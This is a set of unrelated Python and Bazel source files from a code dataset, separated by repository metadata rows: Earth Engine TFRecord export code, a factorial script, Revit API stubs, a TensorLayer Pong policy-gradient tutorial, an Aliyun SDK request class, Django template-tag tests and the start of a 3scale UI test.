# Add random column
vector = vector.randomColumn(seed=999)
# Partition the sample approximately 75%, 25%.
self.training_dataset = vector.filter(ee.Filter.lt('random', 0.75))
self.test_dataset = vector.filter(ee.Filter.gte('random', 0.75))
# Training and validation size
self.training_size = self.training_dataset.size().getInfo()
self.test_size = self.test_dataset.size().getInfo()
if self.kernel_size > 1:
self.base_names = ['training_patches', 'test_patches']
# Convert the image into an array image in which each pixel stores (kernel_size x kernel_size) patches of pixels for each band.
list = ee.List.repeat(1, self.kernel_size)
lists = ee.List.repeat(list, self.kernel_size)
kernel = ee.Kernel.fixed(self.kernel_size, self.kernel_size, lists)
self.arrays = self.image_stack.neighborhoodToArray(kernel)
# Training and test size
nFeatures = len(self.multi_polygon.get('geojson').get('features'))
nPolygons = {}
for n in range(nFeatures):
multipoly_type = self.multi_polygon.get('geojson').get('features')[n].get('properties').get('name')
nPolygons[multipoly_type] = len(self.multi_polygon.get('geojson').get('features')[n].get('geometry').get('coordinates'))
self.training_size = nPolygons['training']*self.sample_size
self.test_size = nPolygons['test']*self.sample_size
def start_TFRecords_task(self, feature_collections, feature_lists):
"""
Create TFRecord's exportation task
"""
# These numbers determined experimentally.
nShards = int(self.sample_size/20) # Number of shards in each polygon.
if self.kernel_size == 1:
# Export all the training and test data.
self.file_paths = []
for n, dataset in enumerate([self.training_dataset, self.test_dataset]):
self.file_paths.append(self.bucket+ '/' + self.folder + '/' + self.base_names[n])
# Create the tasks.
task = ee.batch.Export.table.toCloudStorage(
collection = dataset,
description = 'Export '+self.base_names[n],
fileNamePrefix = self.folder + '/' + self.base_names[n],
bucket = self.bucket,
fileFormat = 'TFRecord',
selectors = list(self.image_stack.bandNames().getInfo())
)
task.start()
if self.kernel_size > 1:
# Export all the training and test data (in many pieces), with one task per geometry.
self.file_paths = []
for i, feature in enumerate(feature_collections):
for g in range(feature.size().getInfo()):
geomSample = ee.FeatureCollection([])
for j in range(nShards):
sample = self.arrays.sample(
region = ee.Feature(feature_lists[i].get(g)).geometry(),
scale = self.scale,
numPixels = self.sample_size / nShards, # Size of the shard.
seed = j,
tileScale = 8
)
geomSample = geomSample.merge(sample)
desc = self.base_names[i] + '_g' + str(g)
self.file_paths.append(self.bucket+ '/' + self.folder + '/' + desc)
task = ee.batch.Export.table.toCloudStorage(
collection = geomSample,
description = desc,
bucket = self.bucket,
fileNamePrefix = self.folder + '/' + desc,
fileFormat = 'TFRecord',
selectors = list(self.image_stack.bandNames().getInfo())
)
task.start()
return task
def export_TFRecords(self, sample_size, kernel_size, scale, bucket, folder):
"""
Export TFRecords to GCS.
Parameters
----------
sample_size: int
Number of samples to extract from each polygon.
kernel_size: int
An integer specifying the height and width of the 2D images.
scale: float
Scale of the images in meters.
bucket: string
Bucket name.
folder: string
Folder path to save the data.
"""
self.sample_size = sample_size
self.kernel_size = kernel_size
self.scale = scale
self.bucket = bucket
self.folder = folder
# Convert the GeoJSON to feature collections
feature_collections = GeoJSONs_to_FeatureCollections(self.multi_polygon)
# Convert the feature collections to lists for iteration.
feature_lists = list(map(lambda x: x.toList(x.size()), feature_collections))
## Stack the 2D images to create a single image from which samples can be taken
self.stack_images(feature_collections)
## Start task
task = self.start_TFRecords_task(feature_collections, feature_lists)
# Monitor task status
print('Exporting TFRecords to GCS:')
status_list = check_status_data(task, self.file_paths)
while not status_list == ['COMPLETED'] * len(self.file_paths):
status_list = check_status_data(task, self.file_paths)
#Print temporal status
tmp_status = json.dumps(dict(zip(self.file_paths, status_list)))
print('Temporal status: ', tmp_status)
time.sleep(60)
# Print final status
print('Final status: COMPLETED')
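# Hedged usage sketch (added, not part of the original module). It assumes Earth
# Engine credentials are already initialised and that `areas_geojson` is a list
# of polygon attribute dicts in the format expected by select_areas(); the bucket
# and folder names are placeholders only.
#
#   import ee
#   ee.Initialize()
#   pre = Preprocess()
#   pre.composite(slugs=["Landsat-8-Surface-Reflectance"],
#                 init_date='2017-01-01', end_date='2017-12-31')
#   pre.select_areas(areas_geojson)
#   pre.export_TFRecords(sample_size=2000, kernel_size=256, scale=30,
#                        bucket='my-bucket', folder='tfrecords/demo')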
| 40.672535
| 154
| 0.584019
|
4774851a3a74886cd627478ab92aeb93dde703ff
| 277
|
py
|
Python
|
factorial.py
|
phsantosjr/python-algorithms
|
4683b66eb3b7e934ccb8f7bb263f3988a661c202
|
[
"CNRI-Python"
] | null | null | null |
factorial.py
|
phsantosjr/python-algorithms
|
4683b66eb3b7e934ccb8f7bb263f3988a661c202
|
[
"CNRI-Python"
] | null | null | null |
factorial.py
|
phsantosjr/python-algorithms
|
4683b66eb3b7e934ccb8f7bb263f3988a661c202
|
[
"CNRI-Python"
] | null | null | null |
from utils import timer_decorator
@timer_decorator
def fact_1(n: int) -> int:
product = 1
for i in range(n):
product = product * (i+1)
return product
@timer_decorator
def fact_2(n: int) -> int:
if n == 0:
return 1
return n * fact_2(n-1)
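# Note (added): `timer_decorator` comes from the local `utils` module, which is
# not shown here; it presumably times each call and prints the elapsed time.
# Because fact_2 is recursive and the decorator wraps the module-level name,
# every recursion level is timed and reported separately. A quick, guarded
# smoke test (assuming the decorator returns the wrapped result):
if __name__ == '__main__':
    print(fact_1(5))  # expected 120
    print(fact_2(5))  # expected 120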
| 16.294118
| 33
| 0.602888
|
c2640e665c5a574cd9b095a2f8c64075ea820ad2
| 13,280
|
py
|
Python
|
stubs.min/Autodesk/Revit/DB/__init___parts/FabricationConfiguration.py
|
ricardyn/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | 1
|
2021-02-02T13:39:16.000Z
|
2021-02-02T13:39:16.000Z
|
stubs.min/Autodesk/Revit/DB/__init___parts/FabricationConfiguration.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
stubs.min/Autodesk/Revit/DB/__init___parts/FabricationConfiguration.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
class FabricationConfiguration(Element,IDisposable):
""" This element contains the information about the fabrication configuration settings used by the project. """
def CanBeSwapped(self):
"""
CanBeSwapped(self: FabricationConfiguration) -> bool
Checks if the fabrication configuration can be swapped.
Returns: True if the fabrication configuration can be swapped,false otherwise.
"""
pass
def Dispose(self):
""" Dispose(self: Element,A_0: bool) """
pass
def GetAllFabricationConnectorDefinitions(self,domain,shape):
"""
GetAllFabricationConnectorDefinitions(self: FabricationConfiguration,domain: ConnectorDomainType,shape: ConnectorProfileType) -> IList[int]
Gets fabrication connector identifiers from the fabrication configuration,
filtered by shape and domain.
domain: ConnectorDomainType to filter by. Pass ConnectorDomainType.Undefined to get all
connector domains.
shape: ConnectorProfileType to filter by. Pass ConnectorProfileType.Invalid to get all
shapes.
Returns: All the fabrication connector identifiers,filtered by shape and domain. The
return will be empty if no connectors are found.
"""
pass
def GetAllInsulationSpecifications(self,pFabPart):
"""
GetAllInsulationSpecifications(self: FabricationConfiguration,pFabPart: FabricationPart) -> IList[int]
Gets all insulation specification identifiers in the fabrication configuration.
pFabPart: The fabrication part.
Returns: An array of insulation specification identifiers.
"""
pass
def GetAllLoadedServices(self):
"""
GetAllLoadedServices(self: FabricationConfiguration) -> IList[FabricationService]
Returns all the loaded fabrication services.
Returns: All the loaded fabrication services.
"""
pass
def GetAllMaterials(self,part):
"""
GetAllMaterials(self: FabricationConfiguration,part: FabricationPart) -> IList[int]
Gets all material identifiers in the fabrication configuration.
part: The fabrication part.
Returns: An array of material identifiers.
"""
pass
def GetAllServices(self):
"""
GetAllServices(self: FabricationConfiguration) -> IList[FabricationService]
Returns all fabrication services in the fabrication configuration.
Returns: All fabrication services. The return will be empty if no services are found.
"""
pass
def GetAllSpecifications(self,part):
"""
GetAllSpecifications(self: FabricationConfiguration,part: FabricationPart) -> IList[int]
Gets all specification identifiers in the fabrication configuration.
part: The fabrication part.
Returns: An array of specification identifiers.
"""
pass
def GetAllUsedServices(self):
"""
GetAllUsedServices(self: FabricationConfiguration) -> IList[FabricationService]
Returns all the used fabrication services. A service is used if any fabrication
part in the service is created by user.
Returns: All the used fabrication services.
"""
pass
def getBoundingBox(self,*args):
""" getBoundingBox(self: Element,view: View) -> BoundingBoxXYZ """
pass
@staticmethod
def GetFabricationConfiguration(doc):
"""
GetFabricationConfiguration(doc: Document) -> FabricationConfiguration
Gets the fabrication configuration element in the document.
doc: The document.
Returns: The fabrication configuration element in the document.
"""
pass
def GetFabricationConfigurationInfo(self):
"""
GetFabricationConfigurationInfo(self: FabricationConfiguration) -> FabricationConfigurationInfo
Gets the information about the fabrication configuration of the project.
Returns: The information about the fabrication configuration of the project.
"""
pass
def GetFabricationConnectorDomain(self,fabricationConnectorId):
"""
GetFabricationConnectorDomain(self: FabricationConfiguration,fabricationConnectorId: int) -> ConnectorDomainType
Gets the fabrication connector domain from its identifier.
fabricationConnectorId: The fabrication connector identifier.
Returns: The fabrication connector's domain.
"""
pass
def GetFabricationConnectorGroup(self,fabricationConnectorId):
"""
GetFabricationConnectorGroup(self: FabricationConfiguration,fabricationConnectorId: int) -> str
Gets the fabrication connector group from its identifier.
fabricationConnectorId: The fabrication connector identifier.
Returns: The fabrication connector's group.
"""
pass
def GetFabricationConnectorName(self,fabricationConnectorId):
"""
GetFabricationConnectorName(self: FabricationConfiguration,fabricationConnectorId: int) -> str
Gets the fabrication connector name from its identifier.
fabricationConnectorId: The fabrication connector identifier.
Returns: The fabrication connector's name.
"""
pass
def GetFabricationConnectorShape(self,fabricationConnectorId):
"""
GetFabricationConnectorShape(self: FabricationConfiguration,fabricationConnectorId: int) -> ConnectorProfileType
Gets the fabrication connector shape from its identifier.
fabricationConnectorId: The fabrication connector identifier.
Returns: The fabrication connector's shape.
"""
pass
def GetInsulationSpecificationAbbreviation(self,insulationSpecificationId):
"""
GetInsulationSpecificationAbbreviation(self: FabricationConfiguration,insulationSpecificationId: int) -> str
Gets insulation specification abbreviation.
insulationSpecificationId: The insulation specification identifier.
"""
pass
def GetInsulationSpecificationGroup(self,specId):
"""
GetInsulationSpecificationGroup(self: FabricationConfiguration,specId: int) -> str
Gets the insulation specification group from its identifier.
specId: The insulation specification identifier.
Returns: The insulation specification group.
"""
pass
def GetInsulationSpecificationName(self,specId):
"""
GetInsulationSpecificationName(self: FabricationConfiguration,specId: int) -> str
Gets the insulation specification name from its identifier.
specId: The insulation specification identifier.
Returns: The insulation specification name.
"""
pass
def GetMaterialAbbreviation(self,materialId):
"""
GetMaterialAbbreviation(self: FabricationConfiguration,materialId: int) -> str
Gets the abbreviation of the material or the insulation or the double wall
material.
materialId: The material identifier.
"""
pass
def GetMaterialGroup(self,materialId):
"""
GetMaterialGroup(self: FabricationConfiguration,materialId: int) -> str
Gets material group from its identifier.
materialId: The material identifier.
Returns: The material group.
"""
pass
def GetMaterialName(self,materialId):
"""
GetMaterialName(self: FabricationConfiguration,materialId: int) -> str
Gets material name from its identifier.
materialId: The material identifier.
Returns: The material name without the group.
"""
pass
def GetMaterialThickness(self,materialId,gaugeId):
"""
GetMaterialThickness(self: FabricationConfiguration,materialId: int,gaugeId: int) -> float
Gets material thickness from its material/gauge identifiers.
materialId: The material identifier.
gaugeId: The gauge identifier within the specified material.
Returns: The thickness of the material/gauge.
"""
pass
def GetProfile(self):
"""
GetProfile(self: FabricationConfiguration) -> str
Return the profile of the loaded fabrication configuration. Return empty string
for global profile.
"""
pass
def GetService(self,serviceId):
"""
GetService(self: FabricationConfiguration,serviceId: int) -> FabricationService
Get the service based on the service identifier from the fabrication
configuration in the current document.
serviceId: The service identifier.
Returns: The service based on the service identifier.
"""
pass
def GetSpecificationAbbreviation(self,specificationId):
"""
GetSpecificationAbbreviation(self: FabricationConfiguration,specificationId: int) -> str
Gets the specification abbreviation.
specificationId: The specification identifier.
"""
pass
def GetSpecificationGroup(self,specId):
"""
GetSpecificationGroup(self: FabricationConfiguration,specId: int) -> str
Gets the specification group from its identifier.
specId: The specification identifier.
Returns: The specification group.
"""
pass
def GetSpecificationName(self,specId):
"""
GetSpecificationName(self: FabricationConfiguration,specId: int) -> str
Gets the specification name from its identifier.
specId: The specification identifier.
Returns: The specification name;
"""
pass
def HasValidConfiguration(self):
"""
HasValidConfiguration(self: FabricationConfiguration) -> bool
Checks whether a valid fabrication configuration has been set for the project.
Returns: True if a valid fabrication configuration has been set for the project.
"""
pass
def LoadServices(self,serviceIds):
""" LoadServices(self: FabricationConfiguration,serviceIds: IList[int]) -> IList[int] """
pass
def LocateFabricationConnector(self,group,name,domain,shape):
"""
LocateFabricationConnector(self: FabricationConfiguration,group: str,name: str,domain: ConnectorDomainType,shape: ConnectorProfileType) -> int
Gets the fabrication connector identifiers by group and name,filtered by shape
and domain.
group: The fabrication connector group.
name: The fabrication connector name.
domain: ConnectorDomainType to filter by. Pass ConnectorDomainType::Undefined to get
all connector domains.
shape: ConnectorProfileType to filter by. Pass ConnectorProfileType::Invalid to get
all shapes.
Returns: Return the fabrication connector identifier. Returns -1 if not found.
"""
pass
def LocateInsulationSpecification(self,group,name):
"""
LocateInsulationSpecification(self: FabricationConfiguration,group: str,name: str) -> int
Gets the insulation specification by group and name.
group: The insulation specification group.
name: The insulation specification name.
Returns: The insulation specification identifier. Returns -1 if not found.
"""
pass
def LocateMaterial(self,group,name):
"""
LocateMaterial(self: FabricationConfiguration,group: str,name: str) -> int
Gets material by group and name.
group: The material group.
name: The group name.
Returns: The material identifier. Returns -1 if not found.
"""
pass
def LocateSpecification(self,group,name):
"""
LocateSpecification(self: FabricationConfiguration,group: str,name: str) -> int
Gets the specification identifier by group and name.
group: The specification group.
name: The specification name.
Returns: The specification identifier. Returns -1 if not found.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: Element,disposing: bool) """
pass
def ReloadConfiguration(self):
"""
ReloadConfiguration(self: FabricationConfiguration) -> ConfigurationReloadInfo
Reloads the fabrication configuration from its source fabrication configuration.
Returns: The information about the reload of the fabrication configuration.
"""
pass
def SetConfiguration(self,fabricationConfigurationInfo,profile=None):
"""
SetConfiguration(self: FabricationConfiguration,fabricationConfigurationInfo: FabricationConfigurationInfo)
Set the fabrication configuration with global profile.
fabricationConfigurationInfo: The desired fabrication configuration.
SetConfiguration(self: FabricationConfiguration,fabricationConfigurationInfo: FabricationConfigurationInfo,profile: str)
Set the fabrication configuration with specific profile.
fabricationConfigurationInfo: The desired fabrication configuration.
profile: The desired profile of the fabrication configuration. Use empty string for the
global profile.
"""
pass
def setElementType(self,*args):
""" setElementType(self: Element,type: ElementType,incompatibleExceptionMessage: str) """
pass
def UnloadServices(self,serviceIds):
""" UnloadServices(self: FabricationConfiguration,serviceIds: IList[int]) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
| 35.603217
| 215
| 0.731175
|
0ffee91744eabf13ec286da0906dce52c6ee1f3e
| 4,587
|
py
|
Python
|
examples/reinforcement_learning/tutorial_atari_pong.py
|
KuKuXia/tensorlayer
|
654de4a37892cde54495350f99f5f3b38b2c6eb3
|
[
"Apache-2.0"
] | 1
|
2019-10-21T13:33:52.000Z
|
2019-10-21T13:33:52.000Z
|
examples/reinforcement_learning/tutorial_atari_pong.py
|
Mesica/tensorlayer
|
c5def14c4d66d150863f975d9001a5e1891d003f
|
[
"Apache-2.0"
] | null | null | null |
examples/reinforcement_learning/tutorial_atari_pong.py
|
Mesica/tensorlayer
|
c5def14c4d66d150863f975d9001a5e1891d003f
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""Monte-Carlo Policy Network π(a|s) (REINFORCE).
To understand Reinforcement Learning, we let the computer learn how to play
the Pong game from the raw screen inputs. Before we start, we highly recommend
going through the famous blog post “Deep Reinforcement Learning: Pong from
Pixels”, a minimalistic implementation of deep reinforcement learning using
python-numpy and the OpenAI gym environment.
The code here is a reimplementation of Karpathy's blog post using TensorLayer.
Compared with Karpathy's code, we store the observations for a whole batch,
while he stores the observations for a single episode only and stores the
gradients instead (so we will use more memory if the observations are very large).
FEEL FREE TO JOIN US !
TODO
-----
- update grads every step rather than storing all observation!
- tensorlayer@gmail.com
References
------------
- http://karpathy.github.io/2016/05/31/rl/
"""
import time
import numpy as np
import gym
import tensorflow as tf
import tensorlayer as tl
tl.logging.set_verbosity(tl.logging.DEBUG)
# hyper-parameters
image_size = 80
D = image_size * image_size
H = 200
batch_size = 10
learning_rate = 1e-4
gamma = 0.99
decay_rate = 0.99
render = False # display the game environment
# resume = True # load existing policy network
model_file_name = "model_pong"
np.set_printoptions(threshold=np.inf)
def prepro(I):
"""Prepro 210x160x3 uint8 frame into 6400 (80x80) 1D float vector."""
I = I[35:195]
I = I[::2, ::2, 0]
I[I == 144] = 0
I[I == 109] = 0
I[I != 0] = 1
return I.astype(np.float32).ravel()
env = gym.make("Pong-v0")
observation = env.reset()
prev_x = None
running_reward = None
reward_sum = 0
episode_number = 0
xs, ys, rs = [], [], []
# policy network
def get_model(inputs_shape):
ni = tl.layers.Input(inputs_shape)
nn = tl.layers.Dense(n_units=H, act=tf.nn.relu, name='hidden')(ni)
nn = tl.layers.Dense(n_units=3, name='output')(nn)
M = tl.models.Model(inputs=ni, outputs=nn, name="mlp")
return M
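# Hedged reference implementation (not part of the original tutorial) of the discounted
# return computed later by tl.rein.discount_episode_rewards with its default Pong-style
# reset: rewards are accumulated backwards with factor gamma, and the running sum is
# reset whenever a non-zero reward marks the end of a rally. The helper name
# _discount_rewards_reference is ours, purely for illustration.
def _discount_rewards_reference(rewards, gamma=0.99):
    discounted = np.zeros(len(rewards), dtype=np.float32)
    running = 0.0
    for t in reversed(range(len(rewards))):
        if rewards[t] != 0:
            running = 0.0  # rally boundary in Pong
        running = running * gamma + rewards[t]
        discounted[t] = running
    return discounted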
model = get_model([None, D])
train_weights = model.trainable_weights
optimizer = tf.optimizers.RMSprop(lr=learning_rate, decay=decay_rate)
model.train() # set model to train mode (in case you add dropout into the model)
start_time = time.time()
game_number = 0
while True:
if render:
env.render()
cur_x = prepro(observation)
x = cur_x - prev_x if prev_x is not None else np.zeros(D, dtype=np.float32)
x = x.reshape(1, D)
prev_x = cur_x
_prob = model(x)
prob = tf.nn.softmax(_prob)
# action. 1: STOP 2: UP 3: DOWN
# action = np.random.choice([1,2,3], p=prob.flatten())
# action = tl.rein.choice_action_by_probs(prob.flatten(), [1, 2, 3])
action = tl.rein.choice_action_by_probs(prob[0].numpy(), [1, 2, 3])
observation, reward, done, _ = env.step(action)
reward_sum += reward
xs.append(x) # all observations in an episode
ys.append(action - 1) # all fake labels in an episode (action begins from 1, so minus 1)
rs.append(reward) # all rewards in an episode
if done:
episode_number += 1
game_number = 0
if episode_number % batch_size == 0:
print('batch over...... updating parameters......')
epx = np.vstack(xs)
epy = np.asarray(ys)
epr = np.asarray(rs)
disR = tl.rein.discount_episode_rewards(epr, gamma)
disR -= np.mean(disR)
disR /= np.std(disR)
xs, ys, rs = [], [], []
with tf.GradientTape() as tape:
_prob = model(epx)
_loss = tl.rein.cross_entropy_reward_loss(_prob, epy, disR)
grad = tape.gradient(_loss, train_weights)
optimizer.apply_gradients(zip(grad, train_weights))
## TODO
# if episode_number % (batch_size * 100) == 0:
# tl.files.save_npz(network.all_params, name=model_file_name + '.npz')
running_reward = reward_sum if running_reward is None else running_reward * 0.99 + reward_sum * 0.01
print('resetting env. episode reward total was {}. running mean: {}'.format(reward_sum, running_reward))
reward_sum = 0
observation = env.reset() # reset env
prev_x = None
if reward != 0:
print(
(
'episode %d: game %d took %.5fs, reward: %f' %
(episode_number, game_number, time.time() - start_time, reward)
), ('' if reward == -1 else ' !!!!!!!!')
)
start_time = time.time()
game_number += 1
| 29.785714
| 112
| 0.640942
|
0d4d664b6ba31fbcd5c4aece1c7d950093da6d87
| 2,180
|
py
|
Python
|
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DetachClassicLinkVpcRequest.py
|
jia-jerry/aliyun-openapi-python-sdk
|
e90f3683a250cfec5b681b5f1d73a68f0dc9970d
|
[
"Apache-2.0"
] | 1
|
2021-03-08T02:59:17.000Z
|
2021-03-08T02:59:17.000Z
|
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DetachClassicLinkVpcRequest.py
|
jia-jerry/aliyun-openapi-python-sdk
|
e90f3683a250cfec5b681b5f1d73a68f0dc9970d
|
[
"Apache-2.0"
] | 1
|
2020-05-31T14:51:47.000Z
|
2020-05-31T14:51:47.000Z
|
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DetachClassicLinkVpcRequest.py
|
jia-jerry/aliyun-openapi-python-sdk
|
e90f3683a250cfec5b681b5f1d73a68f0dc9970d
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkecs.endpoint import endpoint_data
class DetachClassicLinkVpcRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ecs', '2014-05-26', 'DetachClassicLinkVpc','ecs')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_VpcId(self):
return self.get_query_params().get('VpcId')
def set_VpcId(self,VpcId):
self.add_query_param('VpcId',VpcId)
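# Hedged usage sketch (not part of the SDK source): a client would typically send this
# request with aliyunsdkcore roughly as below; the credentials, region and ids are
# placeholders, not real values.
#
#   from aliyunsdkcore.client import AcsClient
#   client = AcsClient("<access-key-id>", "<access-key-secret>", "cn-hangzhou")
#   request = DetachClassicLinkVpcRequest()
#   request.set_InstanceId("i-xxxxxxxx")
#   request.set_VpcId("vpc-xxxxxxxx")
#   response = client.do_action_with_exception(request)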
| 35.16129
| 79
| 0.769725
|
0ba67a75237432d9da5fcfef3a8e84f0d6873583
| 3,680
|
py
|
Python
|
tests/test_template_filters.py
|
Frojd/wagtail-systemtext
|
27579f7b261572a59e48993ae21a44f789f64b0f
|
[
"MIT"
] | 8
|
2016-12-31T12:00:56.000Z
|
2022-03-23T08:12:04.000Z
|
tests/test_template_filters.py
|
Frojd/wagtail-systemtext
|
27579f7b261572a59e48993ae21a44f789f64b0f
|
[
"MIT"
] | 8
|
2017-01-02T19:29:49.000Z
|
2019-01-30T06:31:54.000Z
|
tests/test_template_filters.py
|
Frojd/wagtail-systemtext
|
27579f7b261572a59e48993ae21a44f789f64b0f
|
[
"MIT"
] | 4
|
2016-12-20T11:44:39.000Z
|
2020-08-12T09:10:01.000Z
|
from django.conf import global_settings
from django.template import Context, Template
from django.test import TestCase, modify_settings, override_settings
from wagtailsystemtext.utils import (
set_site, fill_cache, preload, _cleanup,
)
from tests.factories import SiteFactory, PageFactory, SystemStringFactory
@override_settings(
MIDDLEWARE_CLASSES=global_settings.MIDDLEWARE_CLASSES,
TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
],
'APP_DIRS': True,
'OPTIONS': {
'debug': True,
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
],
},
}],
SITE_ID=1
)
class TemplateFiltersTestCase(TestCase):
def tearDown(self):
_cleanup()
def setUp(self):
site = SiteFactory.create(
root_page=PageFactory.create(title='mypage', path='00010002')
)
SystemStringFactory.create(
identifier='title',
string='Headline!',
site=site,
modified=True,
)
SystemStringFactory.create(
identifier='subtitle',
string='Sub Headline!',
group='sub',
site=site,
modified=True,
)
SystemStringFactory.create(
identifier='new_link',
string='',
site=site,
modified=False,
)
SystemStringFactory.create(
identifier='empty_link',
string='',
site=site,
modified=True,
)
set_site(site)
fill_cache(site)
preload(site)
def test_systemtext_tag(self):
out = Template(
"{% load systemtext %}"
"{% systemtext \"title\" %}"
).render(Context({
}))
self.assertTrue('Headline!' in out)
    def test_systemtext_tag_group(self):
out = Template(
"{% load systemtext %}"
"{% systemtext \"subtitle\" group \"sub\" %}"
).render(Context({
}))
self.assertTrue('Sub Headline!' in out)
def test_systemtext_variable_tag(self):
out = Template(
"{% load systemtext %}"
"{% systemtext title_var group \"sub\" %}"
).render(Context({
'title_var': 'subtitle',
}))
self.assertTrue('Sub Headline!' in out)
def test_systemtext_variable_as_var(self):
out = Template(
"{% load systemtext %}"
"{% systemtext title_var group \"sub\" as my_var %}"
"hello_{{my_var}}"
).render(Context({
'title_var': 'subtitle',
}))
self.assertTrue('hello_Sub Headline!' in out)
def test_systemtext_tag_default(self):
out = Template(
"{% load systemtext %}"
"{% systemtext \"new_link\" default \"Wow!\"%}"
).render(Context({
}))
self.assertTrue('Wow!' in out)
def test_systemtext_tag_empty_no_default(self):
out = Template(
"{% load systemtext %}"
"{% systemtext \"empty_link\" default \"Wow!\"%}"
).render(Context({
}))
        self.assertTrue('Wow!' not in out)
| 27.878788
| 73
| 0.547283
|
d17366ae2f87e56dba79b44d7a7c481fafe3d55d
| 609
|
bzl
|
Python
|
source/bazel/deps/cpp_httplib/get.bzl
|
luxe/unilang
|
6c8a431bf61755f4f0534c6299bd13aaeba4b69e
|
[
"MIT"
] | 33
|
2019-05-30T07:43:32.000Z
|
2021-12-30T13:12:32.000Z
|
source/bazel/deps/cpp_httplib/get.bzl
|
luxe/unilang
|
6c8a431bf61755f4f0534c6299bd13aaeba4b69e
|
[
"MIT"
] | 371
|
2019-05-16T15:23:50.000Z
|
2021-09-04T15:45:27.000Z
|
source/bazel/deps/cpp_httplib/get.bzl
|
luxe/unilang
|
6c8a431bf61755f4f0534c6299bd13aaeba4b69e
|
[
"MIT"
] | 6
|
2019-08-22T17:37:36.000Z
|
2020-11-07T07:15:32.000Z
|
# Do not edit this file directly.
# It was auto-generated by: code/programs/reflexivity/reflexive_refresh
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
def cppHttplib():
    http_archive(
        name = "cpp_httplib",
        build_file = "//bazel/deps/cpp_httplib:build.BUILD",
        sha256 = "166103fc4281a438e1f5b9611981f2351ab12136086404895fe5d22e5db3aff5",
        strip_prefix = "cpp-httplib-22615f96828a72d84019b748ede01fa11d905977",
        urls = [
            "https://github.com/Unilang/cpp-httplib/archive/22615f96828a72d84019b748ede01fa11d905977.tar.gz",
        ],
    )
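# Hedged usage sketch (not part of the generated file): a WORKSPACE would typically load
# and invoke this macro as
#   load("//bazel/deps/cpp_httplib:get.bzl", "cppHttplib")
#   cppHttplib()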
| 35.823529
| 109
| 0.71757
|
57ab365f446fbe7edf7d6a69e72c24d384cdb703
| 1,981
|
py
|
Python
|
testsuite/tests/ui/apiap/test_config_version_update_azp_values.py
|
dlaso99/3scale-tests
|
b31a3b3596af6d632b393e383c0417ea56bd95ca
|
[
"Apache-2.0"
] | 5
|
2021-11-04T14:09:24.000Z
|
2021-12-23T13:48:36.000Z
|
testsuite/tests/ui/apiap/test_config_version_update_azp_values.py
|
dlaso99/3scale-tests
|
b31a3b3596af6d632b393e383c0417ea56bd95ca
|
[
"Apache-2.0"
] | 41
|
2021-11-03T14:27:21.000Z
|
2022-03-29T14:46:16.000Z
|
testsuite/tests/ui/apiap/test_config_version_update_azp_values.py
|
dlaso99/3scale-tests
|
b31a3b3596af6d632b393e383c0417ea56bd95ca
|
[
"Apache-2.0"
] | 12
|
2021-11-03T17:28:31.000Z
|
2021-11-30T12:28:25.000Z
|
"""
"https://issues.redhat.com/browse/THREESCALE-6468"
"""
import pytest
from testsuite.ui.views.admin.product.integration.configuration import ProductConfigurationView
from testsuite.ui.views.admin.product.integration.settings import ProductSettingsView
# pylint: disable=unused-argument
@pytest.mark.issue("https://issues.redhat.com/browse/THREESCALE-6468")
def test_config_version(login, service, navigator, threescale, browser, ):
"""
Test:
- Navigates to Product Settings view
        - Changes authentication to OpenID, updates the Product
        - Navigates to Product Configuration
        - Asserts that there is a notification for the outdated config
        - Asserts that the promote button is enabled
        - Promotes to staging
        - Navigates to Product Settings view
        - Changes the default ClientID value "azp", updates the Product
        - Asserts that the desired value is saved to the configuration
